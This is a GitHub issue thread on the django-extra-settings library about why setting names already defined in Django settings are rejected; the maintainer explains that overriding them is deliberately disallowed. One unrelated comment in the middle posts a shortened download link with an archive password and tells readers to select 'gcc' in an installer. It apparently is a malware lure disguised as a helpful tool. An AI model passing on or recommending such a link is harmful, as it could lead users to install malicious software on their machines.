### ISSUE TITLE
Names of Django settings variables are not valid names

### ISSUE THREAD

**Issue by fabiocaccamo** [fabiocaccamo/django-extra-settings#165]
### Discussed in https://github.com/fabiocaccamo/django-extra-settings/discussions/164

<div type='discussions-op-text'>

<sup>Originally posted by **inaltoasinistra** August 27, 2024</sup>
Hello,
I get this error when I try to override a Django settings variable.

`Invalid setting name, settings.MAINTENANCE already defined in django.conf.settings.`

```python
    def clean_name(self):
        value = self.cleaned_data.get("name", "")
        if settings.EXTRA_SETTINGS_ENFORCE_UPPERCASE_SETTINGS:
            value = enforce_uppercase_setting(value)
        if hasattr(settings, value):
            raise forms.ValidationError(
                f"Invalid setting name, settings.{value} already "
                "defined in django.conf.settings."
            )
        return value
```

Why this is a problem? Setting offer the Django settings as fallback, so why shouldn't I override existing settings?
Thank you :)</div>

## Upvote & Fund

- We're using [Polar.sh](https://polar.sh/fabiocaccamo) so you can upvote and help fund this issue.
- We receive the funding once the issue is completed & confirmed by you.
- Thank you in advance for helping prioritize & fund our backlog.

<a href="https://polar.sh/fabiocaccamo/django-extra-settings/issues/165">
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://polar.sh/api/github/fabiocaccamo/django-extra-settings/issues/165/pledge.svg?darkmode=1">
  <img alt="Fund with Polar" src="https://polar.sh/api/github/fabiocaccamo/django-extra-settings/issues/165/pledge.svg">
</picture>
</a>

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by fabiocaccamo** [comment]
@inaltoasinistra allowing to define settings already defined in `settings.py` is not the purpose of this library, considering also that it would be very dangerous and could lead to unexpected scenarios that would be hard to debug.

The "Django settings as fallback" is meant for reading, you can get `DATABASE` setting value using this library, but you can't override it defining a DATABASE setting in the admin.
